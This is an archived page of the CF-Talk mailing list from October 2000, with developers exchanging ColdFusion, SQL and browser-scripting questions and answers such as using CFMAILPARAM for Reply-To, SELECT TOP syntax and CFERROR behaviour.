CFMAIL Reply to

2000-10-20 Thread Juan Andres Alvarez Valenzuela

Hi,

Does anyone know how to put and reply-to in a CFMAIL tag ?

thnx

~Juandres



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: CFMAIL Reply to

2000-10-20 Thread Peter Alexandrou

You use CFMAILPARAM.  An example follows:

CFMAIL TO="recipient" SUBJECT="msg_subject" FROM="sender"  ...more
attibutes...

CFMAILPARAM NAME="Reply-To" VALUE="email address"

...contents of e-mail...

/CFMAIL

Regards,

Peter Alexandrou
Technical Leader

tapestry communications : www.tapestry.net.au
phone : 0411 445 111
e-mail : [EMAIL PROTECTED]


- Original Message -
From: "Juan Andres Alvarez Valenzuela" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Friday, October 20, 2000 5:52 PM
Subject: CFMAIL Reply to


 Hi,

 Does anyone know how to put and reply-to in a CFMAIL tag ?

 thnx

 ~Juandres


 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CF and IBM Websphere

2000-10-20 Thread Stewart McGowan

tried and failed, it requires the use of a voodoo high priestess..

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFMAIL Reply to

2000-10-20 Thread Juan Andres Alvarez Valenzuela

It works.

thanks Peter!!!


~Juandres

- Original Message -
From: Peter Alexandrou [EMAIL PROTECTED]
To: CF-Talk [EMAIL PROTECTED]
Sent: Friday, October 20, 2000 10:59 AM
Subject: Re: CFMAIL Reply to


 You use CFMAILPARAM.  An example follows:

 CFMAIL TO="recipient" SUBJECT="msg_subject" FROM="sender"  ...more
 attibutes...

 CFMAILPARAM NAME="Reply-To" VALUE="email address"

 ...contents of e-mail...

 /CFMAIL

 Regards,

 Peter Alexandrou
 Technical Leader

 tapestry communications : www.tapestry.net.au
 phone : 0411 445 111
 e-mail : [EMAIL PROTECTED]


 - Original Message -
 From: "Juan Andres Alvarez Valenzuela" [EMAIL PROTECTED]
 To: "CF-Talk" [EMAIL PROTECTED]
 Sent: Friday, October 20, 2000 5:52 PM
 Subject: CFMAIL Reply to


  Hi,
 
  Does anyone know how to put and reply-to in a CFMAIL tag ?
 
  thnx
 
  ~Juandres
 
 

 --
 --
  Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
  Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or
send
 a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]

 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: CFINPUT fill-in-the-value question

2000-10-20 Thread Anthony Geoghegan

Hi Scott,
We use something like this

cfset CheckboxArray = ArrayNew(1)
cfloop index="i" from="1" to="#number_of_checkboxes#"
cfset CheckboxArray[i] = ""
/cfloop
cfloop query="get_values"
cfset CheckboxArray[get_values.checkresults] = "checked"
/cfloop
cfoutput
input type="checkbox" name="box" #CheckboxArray[1]# value="1" 
input type="checkbox" name="box" #CheckboxArray[2]# value="2"
input type="checkbox" name="box" #CheckboxArray[3]# value="3"
input type="checkbox" name="box" #CheckboxArray[4]# value="4"
::::   :   :   :   :   ::   ::   :   :   :
::::   :   :   :   :   ::   ::   :   :   :
::::   :   :   :   :   ::   ::   :   :   :
::::   :   :   :   :   ::   ::   :   :   :
::::   :   :   :   :   ::   ::   :   :   :
input type="checkbox" name="box" #CheckboxArray[n]# value="n"
/cfoutput

Hope this helps.
Regards,
Anthony Geoghegan.
Lead Developer,
What's On Where (WOW!)
http://www.wow.ie
mailto:[EMAIL PROTECTED]



-Original Message-
From: Scott Weikert [mailto:[EMAIL PROTECTED]]
Sent: 19 October 2000 22:13
To: CF-Talk
Subject: CFINPUT fill-in-the-value question


How, pray tell... when one has several CFINPUTS that are checkboxes, named
the same but with different numeric values... if one should have a list of a
portion of those values... does one tell a CFINPUT tag to check that list
against the value of the current checkbox field, and check it should it find
a match?

Obviously one can't put a CFIF inside a CFINPUT to check and spit out
"checked" if it finds it... any thoughts?

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



CFQUERY and its GROUP attribute

2000-10-20 Thread Sean Renet

I have an object oriented database, the database has two objects,
PERSON_TYPE_DESC (a persons type) and NAME (the person) theses are called
and joined by a view called people.  I have simplified the code as I use
tags as methods, so the example/question is easier to demonstrate.

Here is the issue, if a person type has more than one person attached I want
I want there to be an (s) after the person type and no (s) if the person
type only has one person.  Also, I do not want there to be a comma after the
last person associated in the display.

So if you simply use cfouput and its group attribute...

cfoutput query="people" group="PERSON_TYPE_DESC"
#PERSON_TYPE_DESC#s:
cfoutput
 #NAME#,
  /cfoutput
   br
/cfoutput
you might get something like this:

Producers: Sean Renet,
Song Writers: Dave Watts, Steve Nelson,

I guess an alternate would be to not use commas at all and use (s) like so

Producer(s): Sean Renet
Song Writer(s): Dave Watts Steve Nelson

I think that looks just as lame so I came up with the following code using
lists.  It works fine, I am just wondering if anyone has anything slicker.
Oh and yes I intend to tagify this, this is just first blush.

cfparam name="persontypelist" default=""
cfparam name="personlist" default=""
cfparam name="fullpersonlist" default=""

!--- output people query to set up lists grouping on PERSON_TYPE_DESC---
cfoutput query="people" group="PERSON_TYPE_DESC"
!--- set the person type list separated by a | as this is the top level
list ---
 cfset persontypelist =
listappend(persontypelist,PERSON_TYPE_DESC,"|")
 cfoutput
  !--- add a space to the name so there will be a space between multiple
names  ---
  cfset thisperson = "nbsp;"  name
  !--- make a sublevel list with a comma grouping it at the top level
list ---
  cfset personlist = listappend(personlist,thisperson,",")
 /cfoutput
 !--- make a person list that reconciles sublevel list with top level list
position ---
 cfset fullpersonlist = listappend(fullpersonlist,personlist,"|")
 !--- clear sublevel list ---
 cfset personlist = ""
/cfoutput

!--- set a loop based on the length of top level list ---
cfloop index="i" from="1" to="#listlen(persontypelist,"|")#"
!--- output data using loop index as position for top level lists and check
the length of reconciled sublevel list to decide whether to add an (s) to
top level person type output ---
 cfoutput
 #listgetat(persontypelist,i,"|")#cfif
listlen(listgetat(fullpersonlist,i,"|"),",") GT
1s/cfif:nbsp;nbsp;#listgetat(fullpersonlist,i,"|")# br
 /cfoutput
/cfloop

this produces...

Producer: Sean Renet
Song Writers: Dave Watts, Steve Nelson

wouldn't be great if there was a query_name.group.RecordCount variable?
I will eventually use CFASSOCIATE to tagify this, but I just wanted to
easily explain what I was trying to do.


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: fusebox style: too much disk access?

2000-10-20 Thread Sean Renet

All I have to say is that I want to see the app where the client complains
about a 3 millisecond hit.  I think that is where I show them my Broadvision
prices.

Welcome back guys.

Sean Renet.

ps, did "funky ass results" make the book?  :::reaches for his checkbook:::
- Original Message -
From: "Steve Nelson" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Thursday, October 19, 2000 3:23 PM
Subject: Re: fusebox style: too much disk access?


 Don't be confused by what Nat is saying, a single "fuseaction" in a
 Fusebox application may only hit 5-8 files.  It's really not that big a
 deal.

 Steve

 Nat Papovich wrote:
 
  A simple test of included files suggests that CF's internal file access
  functions were pratically built with a cfinclude-heavy architecture in
mind.
  Accessing dozens of files for a single page request is very quick. Out
of
  100 included files, you might notice a 10 ms increase than if you had
all
  the code on the same page. Now that 10 ms performance hit gives you a
  scalable, intelligible architecture. If you have any experience with
really
  large sites, you know that the only safe way to scale a project is to
break
  it into small "minute modules".
 
  All this is without mentioning CF's ability to cache templates
  automatically. Accessing a file from RAM is basically instantaneous.
 
  If code scalability, readability, longevity, and understandability is
  important now or will be important later, you need to adopt a structured
  application methodology like Fusebox.
 
  Nat Papovich
  ICQ 32676414
  "I'm for truth no matter who tells it."
  -Malcolm X, 1965
 
  -Original Message-
  From: Cyrill Vatomsky [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, October 19, 2000 1:00 PM
  To: CF-Talk
  Subject: fusebox style: too much disk access?
 
  I was reading on the fusebox concept of putting minute modules into
separate
  files and the question is: wouldn't that slow the site by having to
access
  too many different disk files to load one page?
 
  Cyrill
 

 --
--
  
  Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
  Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or
send a
  message with 'unsubscribe' in the body to
[EMAIL PROTECTED]

 --
--
  Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
  Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or
send a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]
 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



top 10 is not a field

2000-10-20 Thread Jim Watkins

I noticed when I posted my question on "selecting the top ten of a list of
counties" that 2 or 3 responded with something like: "Select top 10 * (or
your fields)" now how would CF and Oracle respond to such a statement as
'top ten' as it is not a SQL command (as far as I know) or even a field in
my query?


Jim Watkins
(706) 781-2300
http://www.ngtcollege.org



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: top 10 is not a field

2000-10-20 Thread Patricia Lee

Top 10 IS a SQL Command.  I copied this statemtent directly from my SQL 7
Enterprise manager if you still don't believe:

SELECT TOP 10 *
FROM [dbo].[objects]

It returns the top 10 rows, all columns.

-Original Message-
From: Jim Watkins [mailto:[EMAIL PROTECTED]]
Subject: top 10 is not a field


I noticed when I posted my question on "selecting the top ten of a list of
counties" that 2 or 3 responded with something like: "Select top 10 * (or
your fields)" now how would CF and Oracle respond to such a statement as
'top ten' as it is not a SQL command (as far as I know) or even a field in
my query?



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: JavaScript Slow in IE w/Roaming Profile

2000-10-20 Thread Hays, Duncan

I did a little more checking and it seems that JS is slow on all of our
NTsp6 boxes whether or not they have a roaming profile. What actually runs
JS? NT or IE?

Duncan Hays
Peace Corps

-Original Message-
From: Hays, Duncan [mailto:[EMAIL PROTECTED]]
Sent: Thursday, October 19, 2000 9:18 AM
To: CF-Talk
Subject: JavaScript Slow in IE w/Roaming Profile


I'm using CF4.5 to create a timesheet using plain html input elements. I
need JavaScript to recalculate the timesheet as the user enters data into
prior to submitting it back to the server. As I added more code to covert
and add times I noticed it getting slower and slower. I was testing in IE5.0
since that has been made our standard browser. Then I started testing other
browsers... (All the JavaScript is doing is recalculating 1 (of 14) rows of
a pay period.) The results were:

- IE5.0 (and 5.5) on NT4.0sp6 using roaming profile = 3-4 seconds
- Netscape 4.7 on NT4.0sp6 using roaming profile = instantaneous
- IE5.0 on Mac OS8.6 = instantaneous
- IE5.0 on Win98 laptop = instantaneous

Has anyone run across this before and have any idea how IE and roaming
profiles might affect JavaScript?

* Roaming profiles allow centralized management and are stored on a server
so that you can log in from anywhere on the LAN and get your same desktop.

Thanks

Duncan Hays
Peace Corps


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Macs and CFGRID

2000-10-20 Thread Stewart McGowan

Afternoon/Morning All,

Our intranet up 'till now has been used by management, sales and accounts,
i.e. pc users. The scope has now changed and the production department, who
are all mac user, are now able to access the systems. My problem is that
Macs using OS9 and IE5 are having problems using the CFGRID component,
basically its damn slow. I've searched the archives and although there has
been mention of this problem there has been, as yet, no solutions added,
anyone got any ideas?

Regards

Stew

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: JavaScript Slow in IE w/Roaming Profile

2000-10-20 Thread Neil Clark

IE

! ---
Neil Clark
Senior Web Applications Engineer
mcb digital
Tel. +44 (0)20 8941 3232
Tel. +44 (0)20 8408 8131 [Direct]
http://www.mcbdigital.com
---




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: cfhttp problems/getting system information from users i.e. cpu speed/ram

2000-10-20 Thread Edward Peloke

Here is the address.  I would like for the people in my office to be able to
go here, and run the tests.  The tests generate webpages that have all of
the information into forms which they put into their database.  I need to
figure out a way to grab the data out of the forms and put it into our
database. Just so that we have a record of what everyon'e system is so if
someone says they have a problem, we can just check the db now they have a
pIII  600 with 128 megs RAM, etc.

http://wintune.winmag.com

Thanks,

Eddie


-Original Message-
From: Warrick, Mark [mailto:[EMAIL PROTECTED]]
Sent: Thursday, October 19, 2000 5:56 PM
To: CF-Talk
Cc: [EMAIL PROTECTED]
Subject: RE: cfhttp problems/getting system information from users i.e.
cpu speed/ram


You know, now that I've re-read your message, I think I understand what
you're trying to do.

Could you send us the URL for the site you're talking about?

---mark

--
Mark Warrick
Phone: (714) 547-5386
Efax.com Fax: (801) 730-7289
Personal Email: [EMAIL PROTECTED]
Personal URL: http://www.warrick.net
Business Email: [EMAIL PROTECTED]
Business URL: http://www.fusioneers.com
ICQ: 346566
--


 -Original Message-
 From: Warrick, Mark [mailto:[EMAIL PROTECTED]]
 Sent: Thursday, October 19, 2000 1:55 PM
 To: CF-Talk
 Subject: RE: cfhttp problems/getting system information from users i.e.
 cpu speed/ram


 Help me to understand how using only HTML (or ColdFusion
 generated HTML) you could find out that information about
 someone's system.

 CFHTTP is usually used for fetching files (URLs).

 --
 Mark Warrick
 Phone: (714) 547-5386
 Efax.com Fax: (801) 730-7289
 Personal Email: [EMAIL PROTECTED]
 Personal URL: http://www.warrick.net
 Business Email: [EMAIL PROTECTED]
 Business URL: http://www.fusioneers.com
 ICQ: 346566
 --


  -Original Message-
  From: Edward Peloke [mailto:[EMAIL PROTECTED]]
  Sent: Thursday, October 19, 2000 1:03 PM
  To: CF-Talk
  Subject: cfhttp problems/getting system information from users i.e. cpu
  speed/ram
 
 
  Hello,
 
  I am having trouble using cfhttp, everytime I us it I get a connection
  error, I have read that this is caused by the firewall, is this
  true?  What
  I am trying to do is have our employees go to a website that runs
  a check on
  their system, i.e. hard drive, ram, speed, etc. the website
 saves all this
  information into its database but we want to somehow use cf to
  save it into
  ours and I thought the cfhttp tag might help...any suggestions??
 
  THanks,
  Eddie
 
 
  --
  --
  Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
  Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists
  or send a message with 'unsubscribe' in the body to
  [EMAIL PROTECTED]

 --
 --
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts
 or send a message with 'unsubscribe' in the body to
 [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=sts or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: top 10 is not a field

2000-10-20 Thread JustinMacCarthy

TOP 10 is a MsSql server command NOT an ANSI SQL-92 Sql syntax..

Jim you should buy SQL for Smarties by Joe Clecko, it has ANSI ways of doing
this and many other tricks(trees )

EG. Get the top 3 earners

SELECT DISTINCT COUNT(*), A.salary
FROM Employees AS A, Employees AS B
WHERE (A.salary = B.Salary)
GROUP BY A.salary
HAVING COUNT(*) = 3 // change this for top n

JustinMacCarthy



- Original Message -
From: "Patricia Lee" [EMAIL PROTECTED]
To: "CF-Talk" [EMAIL PROTECTED]
Sent: Friday, October 20, 2000 1:18 PM
Subject: RE: top 10 is not a field


 Top 10 IS a SQL Command.  I copied this statemtent directly from my SQL 7
 Enterprise manager if you still don't believe:

 SELECT TOP 10 *
 FROM [dbo].[objects]

 It returns the top 10 rows, all columns.

 -Original Message-
 From: Jim Watkins [mailto:[EMAIL PROTECTED]]
 Subject: top 10 is not a field


 I noticed when I posted my question on "selecting the top ten of a list of
 counties" that 2 or 3 responded with something like: "Select top 10 * (or
 your fields)" now how would CF and Oracle respond to such a statement as
 'top ten' as it is not a SQL command (as far as I know) or even a field in
 my query?


 --
--
 Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
 Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send
a message with 'unsubscribe' in the body to
[EMAIL PROTECTED]




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Macs and CFGRID

2000-10-20 Thread Hays, Duncan

I don't know if this is an option but you could try it with OS X. It's
supposed to have much better Java support.

-Original Message-
From: Stewart McGowan [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 8:19 AM
To: CF-Talk
Subject: Macs and CFGRID


Afternoon/Morning All,

Our intranet up 'till now has been used by management, sales and accounts,
i.e. pc users. The scope has now changed and the production department, who
are all mac user, are now able to access the systems. My problem is that
Macs using OS9 and IE5 are having problems using the CFGRID component,
basically its damn slow. I've searched the archives and although there has
been mention of this problem there has been, as yet, no solutions added,
anyone got any ideas?

Regards

Stew


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: top 10 is not a field

2000-10-20 Thread David Shadovitz

No, TOP is not standard SQL.  It is an extension available in some SQL
implementations.

Earlier this month Chris Lott posted two queries which produce the same
result, one using TOP and one not (and hence quite a bit longer).  He'd
asked for comments, but I don't recall seeing any. 

-David

On Fri, 20 Oct 2000 08:18:11 -0400 Patricia Lee [EMAIL PROTECTED]
writes:
 Top 10 IS a SQL Command.  I copied this statemtent directly from my 
 SQL 7
 Enterprise manager if you still don't believe:
 
 SELECT TOP 10 *
 FROM [dbo].[objects]
 
 It returns the top 10 rows, all columns.
 
 -Original Message-
 From: Jim Watkins [mailto:[EMAIL PROTECTED]]
 Subject: top 10 is not a field
 
 
 I noticed when I posted my question on "selecting the top ten of a 
 list of
 counties" that 2 or 3 responded with something like: "Select top 10 
 * (or
 your fields)" now how would CF and Oracle respond to such a 
 statement as
 'top ten' as it is not a SQL command (as far as I know) or even a 
 field in
 my query?

YOU'RE PAYING TOO MUCH FOR THE INTERNET!
Juno now offers FREE Internet Access!
Try it today - there's no risk!  For your FREE software, visit:
http://dl.www.juno.com/get/tagj.

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Macs and CFGRID

2000-10-20 Thread Neil Clark

OS X : it also has MM's for minimize/mazimize buttons :-)

! ---
Neil Clark
Senior Web Applications Engineer
mcb digital
Tel. +44 (0)20 8941 3232
Tel. +44 (0)20 8408 8131 [Direct]
http://www.mcbdigital.com
---




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Macs and CFGRID

2000-10-20 Thread Stewart McGowan

Oh joy :)

Stew

OS X : it also has MM's for minimize/mazimize buttons :-)

! ---
Neil Clark

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Working with FedEx API?

2000-10-20 Thread Simon Horwith

if you e-mail me a copy, or supply a URL to download it, I'll let you know
the class name(s).  Otherwise, try going out to Microsoft's site and
downloading the object/ole viewer (
http://www.microsoft.com/com/resources/oleview.asp ).  Search through "all
objects" for something like 'fedex' or 'fed' or whatever.  You'll find it
(along with all it's exposed methods), if it's registered.

~Simon

-Original Message-
From: Will Ryan [mailto:[EMAIL PROTECTED]]
Sent: Thursday, October 19, 2000 5:40 PM
To: CF-Talk
Subject: Working with FedEx API?


Hi All,

  Has any one out in never never land worked with the FedEx API?  I have
read nearly all the documentation and have yet to find a way to reference
the DLL in HTML or CF.  Any one have any thoughts?

Thanks,
 Will




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: cferror and exceptions

2000-10-20 Thread Jones, Matt

what is the content of the templates that you are calling, in the event of
cferror?  

Only minimal cfcode is allowed, basically cfoutputWhichever error
variables your exception creates/cfoutput.  You can also do whatever
standard html you want.  (I suspect this is so you won't create an exception
and start an infinite loop) 

To do other processing on it, you would need to hit another page.  I
accomplish this by creating a form on the template page. with all of the
error scoped variables being the values of my hidden form fields, display
some type of "happy" error message, and the body tag has an
onLoad="setTimeout('document.forms[0].submit();',6000)" to send it to
another page after enough time to read the page.  This next page can do any
cfm processing.

-Original Message-
From: Lawrence Smith [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 1:01 AM
To: CF-Talk
Subject: cferror and exceptions


Hi All

We are trying to utilise one of the new CF4.5 features where you can catch 
exceptions using cferror instead of using cftry and cfcatch.

However, our host is on 4.5 and it is not working - anyone else had this 
experience of know of a bug/solution?

Many thanks!
Lawrence Smith





Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Email a check???

2000-10-20 Thread Marcus


 That is if they even accept the check in the first place.

 --K

They do... I print all my company checks from a regular HP inkjet printer
and my bank has never even blinked twice about it.

Marcus


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: cferror and exceptions

2000-10-20 Thread Dave Watts

  We are trying to utilise one of the new CF4.5 features where 
  you can catch exceptions using cferror instead of using cftry 
  and cfcatch.
  
  However, our host is on 4.5 and it is not working - anyone 
  else had this experience of know of a bug/solution?
...
 what is the content of the templates that you are calling, in 
 the event of cferror?  
 
 Only minimal cfcode is allowed, basically cfoutputWhichever 
 error variables your exception creates/cfoutput. You can also 
 do whatever standard html you want. (I suspect this is so you 
 won't create an exception and start an infinite loop)

There are a couple of errors here, which should be pointed out.

When you use exception handling, you can specify whatever CFML code you want
within the CFCATCH block(s) of your exception handler. An exception in CF
isn't exactly the same thing as an error - think of it as a potential error,
or an "error-in-waiting".

If an exception isn't handled, it will become an error. CF will stop the
processing of the request, and log the error.

If you use the CFERROR tag with the TYPE attribute set to "REQUEST" to
redirect the error to a specific page, that page may only reference the
error variables, and can't have any CFML tags or functions within it - not
even the CFOUTPUT mentioned above.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: JavaScript Slow in IE w/Roaming Profile

2000-10-20 Thread Dave Watts

  I did a little more checking and it seems that JS is slow on 
  all of our NTsp6 boxes whether or not they have a roaming 
  profile. What actually runs JS? NT or IE?

 IE

Actually, neither "runs" JS. When you install IE, you also install another
program, the Scripting Runtime DLL (scrrun.dll). This is what runs all
JavaScript used by any Microsoft program, whether it's IE or Windows Script
Host. The point is, the JavaScript interpreter isn't part of IE
specifically.

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: cferror and exceptions

2000-10-20 Thread Dave Watts

 We are trying to utilise one of the new CF4.5 features where 
 you can catch exceptions using cferror instead of using cftry 
 and cfcatch.
 
 However, our host is on 4.5 and it is not working - anyone 
 else had this experience of know of a bug/solution?

You'll have to be more specific, I think. What exactly isn't working? Can
you show code?

Dave Watts, CTO, Fig Leaf Software
http://www.figleaf.com/
voice: (202) 797-5496
fax: (202) 797-5444

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: JavaScript Slow in IE w/Roaming Profile

2000-10-20 Thread Neil Clark

yep, but windows effectivelty is the 'Internet Explorer' engine... .dll's
aside.

N

! ---
Neil Clark
Senior Web Applications Engineer
mcb digital
Tel. +44 (0)20 8941 3232
Tel. +44 (0)20 8408 8131 [Direct]
http://www.mcbdigital.com
---




Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



search repeat string within a larger string

2000-10-20 Thread Chen, Yung-Chih (CIT)

Hi,

How can I search a specific string within a larger string, and repeatly
store each specific string's position?

thank you very much!

YC

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: Email a check???

2000-10-20 Thread Jacob

As long as you have the bank number, routing number, account number, 
payee,  amount, and signature, you can write it on any thing you wish.  Bar 
napkin, plain paper, etc...

At 09:11 AM 10/20/00 -0500, you wrote:

  That is if they even accept the check in the first place.
 
  --K

They do... I print all my company checks from a regular HP inkjet printer
and my bank has never even blinked twice about it.

Marcus


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send 
a message with 'unsubscribe' in the body to [EMAIL PROTECTED]



Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



RE: search repeat string within a larger string

2000-10-20 Thread Hayes, David

Look at HELP for reFind; it can return an array with the positions of the
searchString occurrences.

-Original Message-
From: Chen, Yung-Chih (CIT) [mailto:[EMAIL PROTECTED]]
Sent: Friday, October 20, 2000 9:52 AM
To: CF-Talk
Subject: search repeat string within a larger string


Hi,

How can I search a specific string within a larger string, and repeatly
store each specific string's position?

thank you very much!

YC


Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a
message with 'unsubscribe' in the body to [EMAIL PROTECTED]

Archives: http://www.mail-archive.com/cf-talk@houseoffusion.com/
Unsubscribe: http://www.houseoffusion.com/index.cfm?sidebar=lists or send a message 
with 'unsubscribe' in the body to [EMAIL PROTECTED]



Re: Detecting if java enabled for CFSET flashmoviename.swf

2000-10-20 Thread Jack Monteleagre

Patricia,

Thanks for the quick response however my problem is not that I'm trying
to determine if a browser supports Java or even what type of browser is
being used. That is easy enough through cgi variables. 

